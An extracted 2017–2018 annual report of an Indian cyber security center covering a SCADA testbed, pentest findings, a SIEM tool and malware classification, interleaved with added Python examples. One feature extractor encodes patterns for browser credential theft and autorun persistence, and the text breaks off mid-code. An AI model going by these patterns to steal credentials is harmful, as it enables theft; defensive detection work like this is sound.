Page 1: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

National Interdisciplinary Center for Cyber Security

and Cyber Defense of Critical Infrastructures

Manindra Agarwal

Sandeep K. Shukla

Subhash Chandra Srivastava

ANNUAL REPORT 2017 – 2018

Submitted to the Science and Engineering Research Board (SERB)

National Interdisciplinary Center for Cyber Security

and Cyber Defense of Critical Infrastructures


C3i Center | Annual Report 2017 - 2018 2

Contents

History ... 4
Objectives ... 6
Deliverables after 5 years ... 7
VULNERABILITY AND PENETRATION TESTING RESULTS OF SCADA TESTBED ... 8
C3I-GUARDIAN: AN INDIGENOUS SECURITY INCIDENT AND EVENT MANAGEMENT (SIEM) SOLUTION DEVELOPED AT IIT KANPUR ... 9
  A single solution for Cyber Security and Cyber Defense of Critical Infrastructures ... 9
  Milestones Achieved ... 9
INVENTORY INTELLIGENCE SYSTEMS ... 10
SCADA TEST BED PROGRESS ... 13
MALWARE DETECTION, CLASSIFICATION ... 17
  Dataset ... 18
  Features collected by only 4 seconds of malware execution ... 18
  Classification of Zero-day malwares ... 20
  Training and Testing ... 22
  Improvement over our Past Results ... 23
AUTOMATIC MALWARE DETECTION USING MEMORY FORENSICS ... 23
LINUX MALWARE DETECTION BY HYBRID ANALYSIS ... 26
DEVELOPMENT OF HONEYPOTS FOR THREAT INTELLIGENCE ... 28
IOT HONEYPOTS DEPLOYED ... 30
CRYPTANALYSIS AND CRYPTO ENGINEERING ... 33
  Cryptanalysis of 1-Round KECCAK ... 33
  Resource Efficient Implementation of Crypto-primitives in Hardware ... 33
VLSI ARCHITECTURES FOR CRYPTO PRIMITIVES ... 34
PUBLICATIONS - CONFERENCES ... 37
TECHNICAL REPORTS ... 39
HUMAN RESOURCE DEVELOPMENT ... 40
OUTREACH TO RAISE AWARENESS ABOUT CYBER SECURITY ... 41
SUMMER INTERNSHIP PROGRAM ... 44
  Attacks in Android ... 44
SEMINARS ... 46
  Seminars by Faculty ... 46
  Seminars and Events @ CSE, IITK ... 47
MEMORANDUM OF UNDERSTANDING ... 48
  Academic MOUs ... 48
  Industry MOUs ... 49
  TCG MOU ... 49

Table of Figures:

Figure 1: Our Malware Classification Architecture ... 5
Figure 2: Honeypot with Dockers developed in our Lab ... 5
Figure 3: Front End of our SIEM Solution ... 9
Figure 4: Alert Generation Example ... 10
Figure 5: Threat/Attack Statistics Console of Guardian to Help Security Engineers to find out attacks on their system ... 11
Figure 6: Inventory Intelligence Console Displaying Key points of the Cyber Assets Vulnerabilities ... 12
Figure 7: Patch Information on Console ... 12
Figure 8: Schematic of the Industrial Scale Cyber Security Test Bed under Procurement ... 13
Figure 9: Factory Automation Test Bed under Procurement ... 14
Figure 10: Malware Classification Architecture ... 17
Figure 11: Architecture of Classification System for Zero-Day Malware ... 21
Figure 12: Process of detecting malware by using memory forensics ... 25
Figure 13: The process to detect malware by hybrid analysis ... 27
Figure 14: A sample of Analytics on the attacks found on IIT Kanpur Network by our Honeypots ... 31
Figure 15: Distinguishing Script Based Attacks and Manual Attacks based on inter-command Latency ... 34
Figure 16: Operation of the proposed systolic parallel versatile non-vector GF(2^4) LSB first multiplier ... 34
Figure 17: (a) The circuit with synchronous pipeline, (b) Asynchronous pipeline with glitches due to delay imbalance in the forward path, (c) Existing asynchronous pipeline without glitches (absence of delay imbalance in the forward path), (d) Proposed glitch f ... 37
Figure 18: Block diagram of the AES/RS-BCH co-processor connected with 32-bit Microblaze using Xilinx Vivado ... 39


History

In March 2016, SERB/DST sanctioned the establishment of the Interdisciplinary Center for Cyber Security and Cyber Defense of Critical Infrastructure (C3i) center. An amount of 14.43 crores INR was sanctioned over a five year period (March 2016 – Feb 2021) to establish this center as a center of excellence in securing the critical infrastructures of the country. The idea is to build a strong research programme in threat modeling, threat discovery and mitigation techniques, and also to develop education and awareness of the need for protecting critical infrastructures such as the power grid, transportation systems, manufacturing systems, and even banking networks from hackers, the cyber-armies of nation states, and terrorist organizations.

One of the major objectives of the center is to create an industry-scale test bed that would rival the large-scale cyber security test beds present in the National Labs of the United States, such as Sandia National Lab or Idaho National Lab. Such a test bed not only provides a research platform for researchers at IIT Kanpur, but can also be used by industry and utilities to bring their hardware/software for hardware-in-the-loop and software-in-the-loop testing and security validation. It can also be used to train utility engineers and executives about cyber attack surfaces, threats, and mitigation techniques, preparing them for real-life cyber security crises in their organizations.

The other objectives include building indigenous technology in the cyber security of critical infrastructure arena, so that a large number of start-ups at IITK can be incubated and products can be launched to reduce dependence on foreign security products. Dependence on foreign products poses a supply-chain risk to the nation.

Finally, building manpower through IITK degree programs, MOOC courses in cyber security, summer internships at the C3I center, and training programs for utilities and the government sector will be part of the mission of the center.

In this annual report, we briefly go over all the work that has been carried out from March 2016 till April 2018.


Figure 1: Our Malware Classification Architecture

Figure 2: Honeypot with Dockers developed in our Lab

First let us look at the stated objectives and deliverables of the project to put the reported work in context.


Objectives:

1. Build a SCADA test bed with power distribution and transmission systems, and a manufacturing system for process control and discrete control, with a diversity of SCADA protocols, to enable research and education in cyber security of critical infrastructure, in particular power infrastructure and industrial automation.

2. Build methods, techniques, and technology for making SCADA and industrial control IT systems insider-attack-proof.

3. Develop machine learning algorithms for detecting on-going cyber-attacks and advanced persistent threats on power systems.

4. Build methodology and techniques for deploying honeypots and honeynets to develop a malware repository and malware analysis and trend forecasting capabilities.

5. Apply formal methods to develop effective algorithms for vulnerability and malware detection in applications, systems, and firmware, and transfer such technology to a startup ecosystem.

6. Develop protocol reverse engineering tools and capabilities to detect the presence of botnets, trojans and other advanced persistent threats in critical infrastructure.

7. Develop lightweight cryptography and block chain-based authentication, identity management and key management schemes for networks of devices (IoT and M2M).

8. Develop cryptographic co-processors and side-channel proofing techniques for cryptographic hardware and software systems.

9. Develop security architecture, perimeter defense, network and cloud security for critical infrastructure, and inform the policy formulation and best practices guidance for NCIIPC.

10. Field-test security techniques, architectures, and protocols on the IITK smart city project.


Deliverables after 5 years:

1. A national-scale SCADA test bed for research, training, and hardware/software in-the-loop testing by vendors at IIT Kanpur.

2. Tools and techniques for malware collection and benchmark creation for malware analysis and trending.

3. Tools and techniques for application software vulnerability detection.

4. Tools and techniques for insider-threat-proofing critical infrastructure IT systems.

5. Work with a power utility or smart grid corporation to experimentally use our PMU data analytics-based tools for detecting advanced persistent threats.

6. Create at least one start-up with the IIT Kanpur incubation enterprise in the cyber security of critical infrastructure space by licensing IP in vulnerability detection, protocol reverse engineering, malware detection etc.

7. Creation of malware for exploitation of criminal information systems and mobiles for cyber espionage.


VULNERABILITY AND PENETRATION TESTING RESULTS OF SCADA TESTBED

Communication protocol vulnerability: Advanced man-in-the-middle attack demonstrated and mitigation techniques tested.

SCADA application software vulnerability: Privilege escalation and credential dumping from memory have been demonstrated and mitigation techniques tested.

Embedded web server vulnerability: Cross-site request forgery demonstrated, and mitigation techniques tested.

Vulnerabilities in the network devices: Privilege escalation demonstrated, reported to CERT-IN and to the NCSC office.

FTP server vulnerability: Hardcoded credentials demonstrated and tested.

The above work demonstrates that the industrial automation systems deployed in many industrial control systems, water treatment plants (one in Kanpur), and some power distribution systems are vulnerable in multiple ways, and that the vendors of SCADA systems, PLCs, relays and other instrumentation are irresponsible in selling such products in India, leaving our critical infrastructure wide open to attacks.


C3I-GUARDIAN: AN INDIGENOUS SECURITY INCIDENT AND EVENT MANAGEMENT (SIEM) SOLUTION DEVELOPED AT IIT KANPUR

A single solution for Cyber Security and Cyber Defense of Critical Infrastructures.

Many smaller utilities and rural/cooperative banks cannot afford SIEM solutions from vendors such as IBM, FireEye and other multinational companies because of the cost and licensing of the platform technologies. Our solution is built with open source software and can be used freely by such small/medium businesses.

Threat intelligence and security information and event generation:

• Near real time centralized monitoring of both insider and external cyber-attacks on the cyber assets of critical infrastructure.

• Design and development of a centralized security information and event management application.

• Design and deployment of threat intelligence and SIEM is in progress.

Milestones Achieved

Figure 3: Front End of our SIEM Solution


INVENTORY INTELLIGENCE SYSTEMS

Patch management of existing critical cyber assets is extremely important, as the software running on an enterprise's cyber assets often gets hit by zero-day exploits and immediate patching is required. Without a centralized console that shows the latest vulnerabilities and patch information, system administrators have to rely on Internet news articles to figure out the need for patching. With our Inventory Intelligence system, system admins register all cyber assets with their latest firmware, O/S, and applications with the latest patch versions. The system automatically mines the National Vulnerability Database (NVD) and color codes all assets on the console based on the criticality of the patch requirements. As patches get applied, the color code is changed to green. The next step is to put the patch history into a block chain, so that no insider attack can apply unauthorized patches or replace a software component with a malicious one. This is targeted at CISOs and security engineers of small/medium utilities and enterprises.

The features of this inventory intelligence system are:

• Centralized inventory management of cyber assets of critical infrastructure.

• Near real time monitoring and notification of related vulnerabilities to the concerned person, to keep the cyber assets patched and updated.

Figure 4: Alert Generation Example


• Design and development of a standalone application whose potential users are system administrators and Security Operations Centres (SOC).

Providing patch information on the console, along with details of the vulnerability mined from the NVD database, helps system administrators educate themselves before applying a patch.
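As an added illustration of the matching step described above (example code written for this report, not the center's Inventory Intelligence code), the following Python matches registered assets against NVD-style CVE records by vendor, product and affected version range, and color codes each asset by its worst unpatched CVSS v3 base score. The asset names, vendor/product strings and CVE identifiers are constructed placeholders, and the color bands are an assumption.

```python
"""Assumed model of the inventory-intelligence matching step: registered assets
are matched against NVD-style CVE records and color coded by the highest CVSS
base score of any unpatched vulnerability.  Every record below is constructed."""
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Asset:
    name: str       # hostname or tag given at registration
    vendor: str     # CPE-style vendor string
    product: str    # CPE-style product string
    version: str    # currently installed firmware / OS / application version


@dataclass
class CveRecord:
    cve_id: str
    vendor: str
    product: str
    base_score: float                    # CVSS v3 base score, 0.0 .. 10.0
    start_incl: Optional[str] = None     # versionStartIncluding, as in the NVD JSON feeds
    end_excl: Optional[str] = None       # versionEndExcluding: first fixed release


def version_key(v: str) -> tuple:
    """Turn '2.10.3' into (2, 10, 3) so versions compare numerically, not lexically."""
    return tuple(int(p) if p.isdigit() else 0 for p in v.split("."))


def cve_affects(cve: CveRecord, asset: Asset) -> bool:
    """True when the asset's product and version fall inside the CVE's affected range."""
    if (cve.vendor, cve.product) != (asset.vendor, asset.product):
        return False
    v = version_key(asset.version)
    if cve.start_incl and v < version_key(cve.start_incl):
        return False
    if cve.end_excl and v >= version_key(cve.end_excl):
        return False   # running the fixed release or later: already patched
    return True


def color_code(worst: Optional[float]) -> str:
    """Map the worst outstanding score to a console color (assumed bands following
    the NVD CVSS v3 severity ratings: critical >= 9.0, high >= 7.0, medium >= 4.0)."""
    if worst is None:
        return "green"    # nothing outstanding, or everything patched
    if worst >= 9.0:
        return "red"
    if worst >= 7.0:
        return "orange"
    if worst >= 4.0:
        return "yellow"
    return "blue"         # low severity: still unpatched, but not urgent


def assess(asset: Asset, feed: List[CveRecord]) -> dict:
    """Collect the CVEs that still apply to the asset, worst first, and its color."""
    hits = sorted((c for c in feed if cve_affects(c, asset)), key=lambda c: -c.base_score)
    worst = hits[0].base_score if hits else None
    return {"asset": asset.name, "color": color_code(worst), "cves": [c.cve_id for c in hits]}


# Constructed feed: the identifiers are placeholders, not real CVEs.
FEED = [
    CveRecord("CVE-EXAMPLE-0001", "examplevendor", "plc_firmware", 9.8, end_excl="3.2.0"),
    CveRecord("CVE-EXAMPLE-0002", "examplevendor", "plc_firmware", 5.3,
              start_incl="3.0.0", end_excl="3.4.1"),
    CveRecord("CVE-EXAMPLE-0003", "othervendor", "hmi_suite", 7.5, end_excl="12.1"),
]


def demo() -> List[dict]:
    """Three constructed assets: one critical, one fully patched, one high."""
    assets = [
        Asset("plc-feeder-01", "examplevendor", "plc_firmware", "3.1.7"),
        Asset("plc-feeder-02", "examplevendor", "plc_firmware", "3.4.1"),
        Asset("hmi-station", "othervendor", "hmi_suite", "12.0"),
    ]
    return [assess(a, FEED) for a in assets]


if __name__ == "__main__":
    for row in demo():
        print(row)
```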

Figure 5: Threat/Attack Statistics Console of Guardian to Help Security Engineers to find out attacks on their system


Figure 6: Inventory Intelligence Console Displaying Key points of the Cyber Assets Vulnerabilities

Figure 7: Patch Information on Console


SCADA TEST BED PROGRESS

Currently the testbed in our center is a power distribution system automation along with PLC control, relay management, and a SCADA system. However, a new Cyber Security building is being constructed (slated to be completed on July 31st), and an industry-scale testbed with power generation, transmission and distribution, industrial automation, a water treatment plant, process automation, and home automation will be established. The procurement process is currently taking place and will be completed by mid-2019. The procurement has been delayed due to the construction of the building. The procurement schedule is given in Table 1.

Figure 8: Schematic of the Industrial Scale Cyber Security Test Bed under Procurement


Table 1: Procurement Schedule

Description                            | Items                                                                                                   | Procurement Phase                  | Proposed Requisition Date
Binary Ninja                           |                                                                                                         | Delivered at site                  |
Ida Pro                                |                                                                                                         | Delivered at site                  |
Maintenance Kit                        | Screw Driver Set + Pliers + Hammer + Hack Saw + Utility Knife + Drill bit + Allen key + inch tape + adjustable spanner + emergency torch | Delivered at site |
Acrylic Cluster Case for Raspberry Pi  |                                                                                                         | Delivered at site                  |
Crimping Tool                          | RJ45/11 LAN Tester, Krone Tool and 100 pcs Connectors                                                   | Delivered at site                  |
Network Devices and Server             | Server, Router, Firewall, L3 Ethernet Switch, L2 Ethernet Switch, Access Points, Network Rack, Console Server | Request for Bidding           | 26/04/18
Mounting Arrangement                   | Aluminum composite segment, Panel accessories and mounting arrangement                                  | Bidding document is ready          | 26/05/18
Printer & Online UPS                   | Printer, Online UPS                                                                                     | Bidding document is ready          | 26/05/18
Software                               | SCADA Software along with MIS and MES, Antivirus, Operating System                                      | Request for Bidding                | 30/04/18
Power Testbed                          | Diesel Generator, Transformer, Synchronization system                                                   | Bidding document is ready          | 26/05/18
Process Testbed                        | Water Tank, Filter bed, Pump, Valve, Field instruments                                                  | Bidding document is ready          | 31/05/18
Discrete Testbed                       | Feeding Station, Inspection Station, Buffer Station, Processing Station, Sorting Station                | Bidding document is ready          | 30/06/18
PLC Hardware                           | CPU, Analog module, Digital module, Backplane with power supply                                         | Bidding document is ready          | 31/05/18
RTU Hardware                           | CPU, Analog module, Digital module, Backplane with power supply                                         | Bidding document is ready          | 30/06/18
Power Protection Hardware              | Transformer protection device, Distance protection device, Feeder protection device                     | Bidding document is ready          | 10/06/18
Industrial Wireless                    | VSAT communication, Radio communication                                                                 | Bidding document under preparation | 10/08/18
PDC and PMU Hardware                   | PMU, PDC                                                                                                | Bidding document is ready          | 10/06/18
DCS Hardware and Software              | Controller, Software                                                                                    | Bidding document under preparation | 15/07/18
Solar Power Plant                      |                                                                                                         | Started                            | 26/10/18

Figure 9: Factory Automation Test Bed under Procurement (diagram only; labelled components: MES, MIS, AM, ERP, PLM, Internet, VPN tunnel, SCADA, PLC DB server, firewall, web server, supply chain, logistics user, cloud services infrastructure, process automation testbed with DCS DB server, WiFi/WiMAX, operators and SCADA, discrete automation testbed; legend: external firewall, internal firewall, Ethernet switch, router)


MALWARE DETECTION, CLASSIFICATION

One of our objectives is to build machine learning based tools for malware detection and classification to protect systems against malware. Currently we are dependent mostly on foreign malware detection tools sold by Symantec, McAfee, Kaspersky, Sophos etc. Recently, the United States banned the use of Kaspersky tools in all government offices due to concern about backdoors and Trojans in such foreign tools, which could exfiltrate data. So, our goal has been to build tools to classify malware so that we have an indigenous product soon. In the past one and a half years, we have worked extensively on this problem, and here we give a snapshot of our latest work, which allowed us to use dynamic behavior profiling, feature extraction and classification of malware into distinct classes, and to classify previously unseen malware using zero-shot learning.

Figure 10: Malware Classification Architecture


Dataset:

Our dataset comprises around 29550 Win32 malware samples from 8 malware types and 15 malware families. Table 2 provides the details of the dataset used for learning.

Table 2: The Dataset for our Malware Analysis

Malware Type       Malware Family   Number of Samples
TrojanDropper      Sventore.C       1,577
TrojanDropper      Sventore.A       1,347
TrojanDownloader   Renos            1,985
TrojanDownloader   Small            1,316
TrojanDownloader   Tugspay          3,417
Worm               Yuner            3,794
Worm               Allaple          4,258
Worm               VB               2,418
Trojan             Startpage        1,565
Trojan             Comame!gmb       1,830
Virus              Luder            1,967
Virtool            VBInject         1,202
PWS                OnlineGames      1,041
Backdoor           Agent            1,020
Backdoor           RBot             817
Total                               29,554

Features collected by only 4 seconds of malware execution:

• Signatures: from a set of 433 signatures (specific to Windows and networks), 25 frequent signatures were extracted as binary features, for example:
  - Whether it allocates read-write-execute memory (usually to unpack itself)
  - Whether it installs itself for autorun at Windows startup
  - Whether it steals private information from local Internet browsers
  - Whether it queries the disk size, checks the amount of memory in the system, checks adapter addresses etc.

• API bins: API calls were divided into 16 categories (netapi, certificate, notification, network, services, exception, crypto, ole, resource, UI, synchronization, misc, process, file, system, registry) instead of the n-gram technique which is very common in the past literature.

• 31 network features (IP entropy, HTTP information, protocol information, dead hosts, domains, ratio of public and private IP addresses).

• Number of processes created (child and new) and number of dropped files (files downloaded by the sample or created at the beginning while unpacking).
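The following Python is an added example, not the center's feature extractor, showing how the four feature groups above can be derived from a constructed 4-second sandbox report: the API calls are counted into the 16 bins, the four example signatures become binary flags, and IP entropy, the private-IP ratio, domain and dead-host counts, process and dropped-file counts complete the vector. The report layout and the API-to-bin mapping are assumptions made for this example.

```python
"""Behavioural feature extraction of the kind the page describes (API bins,
binary signature flags, network features, process and drop counts) from a
sandbox report.  The report format and the API-to-category mapping are
assumptions for this example; the report itself is constructed."""
import ipaddress
import math
from collections import Counter

API_BINS = ["netapi", "certificate", "notification", "network", "services",
            "exception", "crypto", "ole", "resource", "ui", "synchronization",
            "misc", "process", "file", "system", "registry"]

# Assumed mapping of a handful of Win32 / NT APIs to the page's 16 bins.
API_CATEGORY = {
    "NtAllocateVirtualMemory": "process", "NtProtectVirtualMemory": "process",
    "CreateProcessInternalW": "process", "LdrLoadDll": "misc",
    "NtCreateFile": "file", "NtWriteFile": "file",
    "RegOpenKeyExW": "registry", "RegSetValueExW": "registry",
    "gethostbyname": "network", "connect": "network",
    "NtCreateMutant": "synchronization", "CryptEncrypt": "crypto",
    "GetDiskFreeSpaceExW": "system", "GlobalMemoryStatusEx": "system",
    "GetAdaptersAddresses": "system",
}
SIGNATURES = ["allocates_rwx", "autorun_persistence", "browser_credential_theft", "antivm_queries"]
BROWSER_STORES = ("Login Data", "logins.json", "Web Data")   # Chrome / Firefox credential files
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def api_bin_counts(calls):
    """Count calls per category; APIs missing from the map fall into 'misc'."""
    counts = Counter(API_CATEGORY.get(name, "misc") for name, _ in calls)
    return [counts.get(b, 0) for b in API_BINS]


def signature_flags(calls):
    """Binary features corresponding to the four example signatures on the page."""
    rwx = any(name in ("NtAllocateVirtualMemory", "NtProtectVirtualMemory")
              and args.get("protection") == "PAGE_EXECUTE_READWRITE" for name, args in calls)
    autorun = any(name == "RegSetValueExW" and "\\CurrentVersion\\Run" in args.get("key", "")
                  for name, args in calls)
    browser = any(name == "NtCreateFile" and any(s in args.get("path", "") for s in BROWSER_STORES)
                  for name, args in calls)
    antivm = any(name in ("GetDiskFreeSpaceExW", "GlobalMemoryStatusEx", "GetAdaptersAddresses")
                 for name, _ in calls)
    return [int(rwx), int(autorun), int(browser), int(antivm)]


def network_features(ips, domains, dead_hosts):
    """Four of the page's network features: IP entropy, private-IP ratio, domain and dead-host counts."""
    total = len(ips)
    freq = Counter(ips)
    entropy = -sum(c / total * math.log2(c / total) for c in freq.values()) if total else 0.0
    private = sum(any(ipaddress.ip_address(ip) in net for net in RFC1918) for ip in ips)
    return {"ip_entropy": entropy, "private_ip_ratio": private / total if total else 0.0,
            "n_domains": len(domains), "n_dead_hosts": len(dead_hosts)}


def extract_features(report):
    """Flatten one report into the named feature dictionary a classifier would consume."""
    calls = report["api_calls"]
    ips = [args["ip"] for name, args in calls if name == "connect"]
    feats = dict(zip(API_BINS, api_bin_counts(calls)))
    feats.update(zip(SIGNATURES, signature_flags(calls)))
    feats.update(network_features(ips, report["domains"], report["dead_hosts"]))
    feats["n_processes"] = len(report["processes_created"])
    feats["n_dropped"] = len(report["dropped_files"])
    return feats


# Constructed 4-second report of a fictional dropper; all values are illustrative only.
TMP_EXE = "C:\\Users\\u\\AppData\\Local\\Temp\\svc.exe"
RUN_KEY = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
REPORT = {
    "api_calls": [
        ("NtAllocateVirtualMemory", {"protection": "PAGE_EXECUTE_READWRITE"}),
        ("NtProtectVirtualMemory", {"protection": "PAGE_EXECUTE_READWRITE"}),
        ("LdrLoadDll", {"module": "wininet.dll"}),
        ("RegOpenKeyExW", {"key": RUN_KEY}),
        ("RegSetValueExW", {"key": RUN_KEY, "value": "updater"}),
        ("NtCreateFile", {"path": "C:\\Users\\u\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"}),
        ("NtCreateFile", {"path": TMP_EXE}),
        ("NtWriteFile", {"path": TMP_EXE}),
        ("GetDiskFreeSpaceExW", {}),
        ("GlobalMemoryStatusEx", {}),
        ("gethostbyname", {"host": "update.example.invalid"}),
        ("connect", {"ip": "203.0.113.5"}),
        ("connect", {"ip": "203.0.113.5"}),
        ("connect", {"ip": "192.168.1.20"}),
        ("NtCreateMutant", {"name": "Global\\svc_once"}),
        ("CreateProcessInternalW", {"path": TMP_EXE}),
    ],
    "domains": ["update.example.invalid"],
    "dead_hosts": ["203.0.113.5"],
    "processes_created": ["svc.exe"],
    "dropped_files": [TMP_EXE],
}

if __name__ == "__main__":
    for key, value in extract_features(REPORT).items():
        print(f"{key:24s} {value}")
```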

We have used classifiers such as a simple neural network, XGBoost and KNN to evaluate our technique. Table 3 shows the results of applying these classifiers on the testing set (comprising 20% of the dataset) using all the features discussed in the previous section. The evaluation metrics used are True Positive Rate, False Positive Rate, Precision and F-score.

We achieved a comparable accuracy of 98.02% with just 4 seconds of behavioral data. There is always a tradeoff between achieving good accuracy and performing classification in a short time. Our work has taken care of both.

Table 3: Results of Various Classification Methods Applied to Malware Data Set

Class      | XGBoost                       | KNN                           | Simple Neural Net
           | TPR    FPR     Pr     FM      | TPR    FPR     Pr     FM      | TPR    FPR     Pr     FM
Backdoor   | 0.96   0.003   0.90   0.929   | 0.955  0.007   0.823  0.884   | 0.955  0.006   0.834  0.89
PWS        | 0.955  0.0005  0.98   0.964   | 0.91   0.002   0.919  0.914   | 0.945  0.001   0.964  0.954
Trojan     | 0.923  0.0006  0.99   0.953   | 0.921  0.004   0.965  0.942   | 0.905  0.001   0.99   0.945
TrojDown   | 0.986  0.008   0.97   0.974   | 0.905  0.015   0.949  0.926   | 0.968  0.014   0.953  0.960
TrojDrop   | 0.996  0.0001  0.99   0.99    | 0.985  0.0009  0.991  0.987   | 0.992  0.0009  0.991  0.991
Virtool    | 0.992  0.001   0.96   0.974   | 0.836  0.003   0.924  0.877   | 0.944  0.002   0.947  0.945
Virus      | 0.977  0.0047  0.93   0.949   | 0.770  0.011   0.832  0.799   | 0.910  0.004   0.934  0.921
Worms      | 0.993  0.0041  0.99   0.99    | 0.992  0.036   0.937  0.963   | 0.992  0.009   0.982  0.986


Classification of Zero-day malware:

Using the above models, we can classify the malware accurately 98% of the time. But what happens if the malware authors develop a completely new malware family by exploiting some zero-day vulnerability? For such malware classification, we need to be able to classify malware which has not been seen in the wild (in this case, in our dataset) into its type with only 4 seconds of behavioral information.

Table 4: Dataset used for Zero-Day Malware Classification

Types                  Training   Testing
Worms, Virus, Trojan   7587       3794
TrojanDropper          5417       645
TrojanDownloader       4288       1565
Backdoor               3326       1347
Total                  31766      10356

Table 5: The dataset after SMOTE, which performed best among these techniques (training families and the held-out testing family per type)

Types              Training families                                                                             Testing family
Worms              Allaple, VB, Vobfus, Mydoom                                                                   Yuner
Virus              Luder, Expiro, Virut, Ramnit, Parite, Mabezat, Patchload                                      Krepper
Trojan             Bulta!rfn, Comame!gmb, BHO, Koutodoor, Alureon, Vundo, Agent, Toga!rfn, VB, Bagsu!rfn, Rimecud   Startpage
TrojanDropper      Agent, Lamechi, Small, Sirefef                                                                Sventore.A
TrojanDownloader   Small, Tugspay, Agent, Banload, Delf, Adload, Wintrim                                         Renos
Backdoor           Rbot, Zegost, Hupigon, IRCbot, Delf, Cycbot, Sdbot, VB, Bifrose                               Agent


Figure 11: Architecture of Classification System for Zero-Day Malware

We observed that our dataset is highly imbalanced, i.e. within a type, one family with more samples dominates the other families which have fewer samples. Thus, we applied various resampling techniques such as SMOTE, SMOTEENN, SMOTETomek etc., which are basically oversampling techniques.
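An added pure-Python implementation of SMOTE (not the center's code, which the report does not include) to show what the oversampling does to an imbalanced type: each synthetic sample is an interpolation between a real minority sample and one of its k nearest minority neighbours, and every class is brought up to the size of the largest one. The two-feature data is constructed.

```python
"""SMOTE as used on the page to balance the per-type training sets: each
synthetic sample lies on the segment between a real minority sample and one of
its k nearest minority neighbours (Chawla et al., 2002).  Pure Python and
deterministic under a fixed seed; the two-feature data below is constructed."""
import math
import random


def euclid(a, b):
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))


def k_nearest(points, idx, k):
    """Indices of the k nearest points to points[idx], excluding itself."""
    dists = sorted((euclid(points[idx], p), j) for j, p in enumerate(points) if j != idx)
    return [j for _, j in dists[:k]]


def smote(minority, n_new, k=5, seed=0):
    """Return n_new synthetic samples interpolated between minority neighbours."""
    if n_new <= 0:
        return []
    if len(minority) < 2:
        raise ValueError("SMOTE needs at least two minority samples to interpolate")
    rng = random.Random(seed)
    k = min(k, len(minority) - 1)
    synthetic = []
    for _ in range(n_new):
        i = rng.randrange(len(minority))              # a real minority sample
        j = rng.choice(k_nearest(minority, i, k))     # one of its nearest neighbours
        gap = rng.random()                            # position along the segment, in [0, 1)
        synthetic.append(tuple(x + gap * (y - x) for x, y in zip(minority[i], minority[j])))
    return synthetic


def balance(dataset, seed=0):
    """Oversample every class up to the size of the largest one; originals come first."""
    target = max(len(s) for s in dataset.values())
    return {label: list(samples) + smote(samples, target - len(samples), seed=seed)
            for label, samples in dataset.items()}


# Constructed: a 4-sample Backdoor class beside a 12-sample TrojanDownloader class,
# each sample being (registry-bin count, network-bin count).
DATA = {
    "Backdoor": [(2.0, 9.0), (3.0, 8.0), (2.5, 9.5), (3.5, 8.5)],
    "TrojanDownloader": [(8.0 + 0.25 * i, 1.0 + 0.1 * i) for i in range(12)],
}

if __name__ == "__main__":
    for label, samples in balance(DATA).items():
        print(label, len(samples), samples[-1])
```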

Table 6: Training Set Sample Sizes for Different Classes

Types                  Samples in Training Set
Worms, Virus, Trojan   7587
TrojanDropper          13776
TrojanDownloader       20627
Backdoor               3326
Total                  64362


Training and Testing:

For classifying unknown samples a different approach was adopted, since the basic multi-class classifiers did not perform well on the dataset. Six binary classifiers were created, one per type, and trained one-vs-all: when the classifier for the type Trojan is trained, one class contains all the Trojans and the other class contains samples from the remaining types. Since the feature set consists of four categories (network, process, bins and signatures), various combinations of these categories were tried to find the best feature set for each binary classifier.

Several experiments were also performed in which the top n features, ranked by importance measured with the F-score, were selected as the feature set for the classifiers, with n varying from 5 to 50. For each classifier the feature set that gave the minimum misclassification error on the validation set was selected. For any test sample, the probability of it belonging to each type is then computed with these classifiers, and the sample is assigned to the type with the maximum probability.
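The decision rule and the per-type scoring described above, as an added example rather than the center's code. It combines the six binary classifiers' probabilities by argmax and computes, for each type, the one-vs-all accuracy and false positive rate; it also reports recall, because the one-vs-all accuracy counts the many true negatives of a rare type and so can look good even when few samples of that type are recognised. The classifier probabilities below are constructed stand-ins for the outputs of the trained models.

```python
"""Decision rule and per-type scoring for a one-vs-all ensemble of binary
malware-type classifiers. Added example, not the C3i code: the probability
rows are constructed stand-ins for the six trained classifiers' outputs."""

TYPES = ["Worms", "Virus", "Trojan", "TrojanDropper", "TrojanDownloader", "Backdoor"]


def assign_type(probabilities):
    """probabilities: {type: P(sample belongs to type)} from the binary classifiers.
    The sample receives the type with the highest probability."""
    return max(probabilities.items(), key=lambda kv: kv[1])[0]


def one_vs_all_scores(y_true, y_pred, types=TYPES):
    """For each type t, score the binary problem 't vs rest':
        accuracy = (TP + TN) / N
        FPR      = FP / (FP + TN)    share of non-t samples labelled t
        recall   = TP / (TP + FN)    share of t samples labelled t"""
    n = len(y_true)
    scores = {}
    for t in types:
        tp = sum(1 for a, p in zip(y_true, y_pred) if a == t and p == t)
        fp = sum(1 for a, p in zip(y_true, y_pred) if a != t and p == t)
        tn = sum(1 for a, p in zip(y_true, y_pred) if a != t and p != t)
        fn = n - tp - fp - tn
        scores[t] = {
            "accuracy": round((tp + tn) / n, 4) if n else 0.0,
            "fpr": round(fp / (fp + tn), 4) if (fp + tn) else 0.0,
            "recall": round(tp / (tp + fn), 4) if (tp + fn) else 0.0,
        }
    return scores


def probs(**given):
    """Fill in a full probability row; types not named get a low constructed score."""
    return {t: given.get(t, 0.05) for t in TYPES}


# Constructed samples: (true type, per-type probabilities from the six classifiers).
SAMPLES = [
    ("Worms", probs(Worms=0.81, Trojan=0.20)),
    ("Worms", probs(Worms=0.62, Virus=0.33)),
    ("Virus", probs(Virus=0.70, Worms=0.22)),
    ("Trojan", probs(Trojan=0.66, TrojanDownloader=0.40)),
    ("TrojanDropper", probs(TrojanDropper=0.90, Trojan=0.35)),
    ("TrojanDownloader", probs(Trojan=0.58, TrojanDownloader=0.47)),   # parent type wins
    ("TrojanDownloader", probs(TrojanDownloader=0.71, Trojan=0.30)),
    ("Backdoor", probs(Trojan=0.49, Backdoor=0.41)),                   # misclassified as Trojan
]


def evaluate(samples=SAMPLES):
    """Run the decision rule over the samples and score every type one-vs-all."""
    y_true = [t for t, _ in samples]
    y_pred = [assign_type(p) for _, p in samples]
    return y_pred, one_vs_all_scores(y_true, y_pred)


if __name__ == "__main__":
    y_pred, scores = evaluate()
    for t in TYPES:
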